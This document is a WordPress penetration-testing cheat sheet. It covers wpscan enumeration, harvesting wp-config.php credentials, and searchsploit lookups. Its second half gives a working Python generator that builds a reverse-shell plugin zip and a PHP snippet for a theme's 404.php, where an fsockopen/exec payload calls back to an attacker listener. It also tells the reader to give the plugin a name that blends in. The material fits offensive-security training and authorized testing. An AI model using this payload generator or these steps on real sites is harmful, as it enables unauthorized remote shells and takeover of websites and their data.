WordPress
Main WordPress Files
WordPress runs on PHP and MySQL (or MariaDB).
Uploaded files go to: /wp-content/uploads/
Theme files go to: /wp-content/themes/
Plugin files go to: /wp-content/plugins/
Core files go to: /wp-includes/ (and /wp-admin/)
Login paths to check (only /wp-login.php and /wp-admin/ are core defaults; the others are redirects or rewrites that some sites and plugins add):
/wp-login.php
/wp-login
/wp-admin/
/wp-admin.php
/login/
The database credentials (DB_NAME, DB_USER, DB_PASSWORD, DB_HOST) and the authentication salts live in wp-config.php in the web root. The DB user is frequently, but not always, root. If you can read the file (LFI, a shell, or a leftover copy such as wp-config.php.bak), try those credentials against MySQL and check them for reuse on the WordPress admin accounts and SSH.
There are multiple ways to get a shell through WordPress. Without valid credentials, the first thing to check is the installed plugins: plugins are community written, so they tend to be less secure and less frequently updated than WordPress core.
Scanning WordPress:
Once the plugins and their versions have been identified, run searchsploit against each plugin name and version; a vulnerable plugin can often be turned into remote code execution.
Enumerating Themes and Plugins
Enumerate Plugins
To scan for plugins, run the following:
wpscan --url <URL> -e ap
Argument Key:
"-e" is for enumeration
"ap" is "all plugins"
"vp" is "vulnerable plugins"
"p" is "popular plugins"
Tip: always add --plugins-detection mixed. It combines passive detection (plugin references found in page source) with aggressive detection (directly requesting known plugin paths); the default is passive only and misses plugins the site never references.
Enumeration of Themes
You can tell WPScan to check for themes only by using the following:
wpscan --url <URL> -e at
Argument Key:
"-e" is for enumeration
"t" is "popular themes"
"at" is "all themes"
"vt" is "vulnerable themes" only
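The plugin and theme enumeration above produces a lot of output; what you actually want is a short list of components that are outdated, have known vulnerabilities, or could not be fingerprinted, plus the searchsploit queries to run next. The following triage script is an added example, not part of the original notes or of wpscan. It assumes the report was written with `wpscan --url <URL> -e ap,at --plugins-detection mixed --format json -o scan.json` and that the JSON uses the `plugins`/`themes` -> slug -> `{version, outdated, vulnerabilities}` layout; the key names are the assumption to verify against a real report. The embedded sample is constructed, with placeholder slugs and a placeholder finding.

```python
"""Triage wpscan JSON output into the components worth chasing.

Added example, not part of the original notes or of wpscan. Assumes the
report came from:
    wpscan --url <URL> -e ap,at --plugins-detection mixed --format json -o scan.json
and that it has "plugins"/"themes" -> slug -> {version, outdated, vulnerabilities}
entries (wpscan's layout as I know it; the key names are the assumption here).
"""
import json
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in wpscan's JSON shape. The slugs and the single
# vulnerability entry are placeholders, not real advisories.
SAMPLE_JSON = """
{
  "target_url": "http://target.example/",
  "plugins": {
    "example-gallery": {
      "slug": "example-gallery",
      "latest_version": "2.4.0",
      "outdated": true,
      "vulnerabilities": [
        {"title": "Constructed sample finding (not a real advisory)",
         "fixed_in": "2.4.0"}
      ],
      "version": {"number": "2.1.3", "confidence": 80}
    },
    "akismet": {
      "slug": "akismet",
      "latest_version": "5.3",
      "outdated": false,
      "vulnerabilities": [],
      "version": null
    }
  },
  "themes": {
    "twentytwentythree": {
      "slug": "twentytwentythree",
      "outdated": false,
      "vulnerabilities": [],
      "version": {"number": "1.2"}
    }
  }
}
"""


@dataclass
class Component:
    kind: str                 # "plugin" or "theme"
    slug: str
    version: Optional[str]    # None when wpscan could not fingerprint it
    outdated: bool
    vulns: List[str] = field(default_factory=list)

    @property
    def interesting(self) -> bool:
        # Known vulns and outdated versions are obvious; an unknown version
        # also deserves a manual look rather than being skipped.
        return bool(self.vulns) or self.outdated or self.version is None


def parse_components(report_text: str) -> List[Component]:
    """Flatten the plugins and themes sections of a wpscan JSON report."""
    report = json.loads(report_text)
    out: List[Component] = []
    for section, kind in (("plugins", "plugin"), ("themes", "theme")):
        for slug, entry in (report.get(section) or {}).items():
            ver = entry.get("version") or {}     # null when no version was found
            out.append(Component(
                kind=kind,
                slug=slug,
                version=ver.get("number"),
                outdated=bool(entry.get("outdated")),
                vulns=[v.get("title", "(untitled)")
                       for v in (entry.get("vulnerabilities") or [])],
            ))
    return out


def searchsploit_queries(components: List[Component]) -> List[str]:
    """One title-only searchsploit query per interesting component.

    Exploit-DB titles use the display name with spaces, so the hyphenated
    slug is split into words. Compare the version by hand: titles usually
    say "< 2.4.0" rather than the exact number wpscan found.
    """
    cmds = []
    for c in components:
        if c.interesting:
            words = c.slug.replace("-", " ").replace("_", " ")
            cmds.append(f"searchsploit -t wordpress {c.kind} {words}")
    return cmds


def triage(report_text: str) -> List[str]:
    """Summary lines, returned rather than printed so they can be checked."""
    lines = []
    for c in parse_components(report_text):
        flag = "!" if c.interesting else " "
        lines.append(f"{flag} {c.kind:6} {c.slug:25} {c.version or '?':8} "
                     f"outdated={c.outdated} vulns={len(c.vulns)}")
    return lines


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_JSON
    print("\n".join(triage(text)))
    print("\n".join(searchsploit_queries(parse_components(text))))
```

Run it as `python3 triage.py scan.json`; with no argument it triages the constructed sample. Components with no version are flagged on purpose: a plugin wpscan found but could not version is exactly the one to check by hand (readme.txt, changelog, or the asset paths) before dismissing it.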
Brute Forcing Wordpress:
Remote Code Execution through Plugins (Authenticated)
An administrator (any account with the install_plugins capability) can upload a new plugin from Plugins > Add New > Upload Plugin in the admin panel.
The zip needs only a directory containing one PHP file with a "Plugin Name:" header followed by a reverse-shell payload, which is easy to generate with a short script. Once WordPress has unpacked it into /wp-content/plugins/, requesting that file directly runs the payload and returns a reverse shell.
Start a listener first (for example nc -lvnp <port>).
Install the plugin.
Navigate to it (/wp-content/plugins/<plugin-dir>/<file>.php).
It executes and we get a reverse shell.
Caveat: if wp-config.php sets DISALLOW_FILE_MODS, plugin upload is disabled and the option does not appear in the panel; DISALLOW_FILE_EDIT alone only removes the theme and plugin editors.
Malicious PHP injection
Alternatively, use Appearance > Theme Editor to edit a PHP file of the active theme (404.php is a common choice because nobody legitimately visits it), prepend a reverse-shell payload, and then request a page that renders that template (any non-existent URL for 404.php). The same payload as the plugin method works here.
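The generator below serves both authenticated paths above: it builds the plugin zip for Upload Plugin and also emits the bare PHP snippet to paste into a theme file. It is an added example, not the script the notes refer to. Assumptions: a Linux target where PHP's exec() is not disabled, the classic fsockopen() one-liner (the socket is expected to land on file descriptor 3; try 4 to 6 if nothing connects back), and placeholder values for the plugin name, listener host and port.

```python
"""Build a WordPress plugin zip that opens a reverse shell, plus the bare PHP
snippet for the theme-editor route.

Added example, not the script the notes mention. Assumptions: Linux target,
PHP exec() allowed, fsockopen() socket on fd 3 (try 4-6 if it does not call
back), placeholder plugin name, listener host and port.
"""
import io
import sys
import zipfile
from typing import Dict

PLUGIN_SLUG = "wp-health-check"          # placeholder; pick a name that blends in
PLUGIN_FILE = f"{PLUGIN_SLUG}.php"


def payload_php(lhost: str, lport: int) -> str:
    """Reverse-shell body without the <?php tag, so it can be embedded anywhere."""
    return (
        f"$sock = fsockopen('{lhost}', {lport});\n"
        # fd 3 is assumed to be the socket; sh's stdin/stdout/stderr go to it
        "if ($sock) { exec('/bin/sh -i <&3 >&3 2>&3'); }\n"
    )


def theme_snippet(lhost: str, lport: int) -> str:
    """What to paste at the top of a theme file (e.g. 404.php) in the theme editor."""
    return "<?php\n" + payload_php(lhost, lport) + "?>\n"


def plugin_source(lhost: str, lport: int) -> str:
    """The only file the plugin needs: a header WordPress recognises, then the payload."""
    return (
        "<?php\n"
        "/*\n"
        f"Plugin Name: {PLUGIN_SLUG}\n"
        "Description: Placeholder header so the zip is accepted as a plugin.\n"
        "Version: 1.0\n"
        "*/\n"
        + payload_php(lhost, lport)
    )


def build_plugin_zip(lhost: str, lport: int) -> bytes:
    """Zip with the plugin inside its own directory, as Upload Plugin expects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{PLUGIN_SLUG}/{PLUGIN_FILE}", plugin_source(lhost, lport))
    return buf.getvalue()


def zip_contents(data: bytes) -> Dict[str, str]:
    """Member name -> text, to inspect the archive before uploading it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {name: zf.read(name).decode() for name in zf.namelist()}


def trigger_url(base_url: str) -> str:
    """Direct request that runs the payload once the plugin files are on disk."""
    return f"{base_url.rstrip('/')}/wp-content/plugins/{PLUGIN_SLUG}/{PLUGIN_FILE}"


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} <target-url> <lhost> <lport>")
    target, lhost, lport = sys.argv[1], sys.argv[2], int(sys.argv[3])
    out = f"{PLUGIN_SLUG}.zip"
    with open(out, "wb") as f:
        f.write(build_plugin_zip(lhost, lport))
    print(f"wrote {out}; start the listener first:  nc -lvnp {lport}")
    print("upload via Plugins > Add New > Upload Plugin, then request:")
    print(trigger_url(target))
    print("theme-editor alternative, paste at the top of 404.php of the active theme:")
    print(theme_snippet(lhost, lport))
```

Activating the plugin also runs the file (WordPress includes it on activation), so the admin page will hang while the shell is open; requesting the file directly instead keeps the panel usable and is what the notes describe.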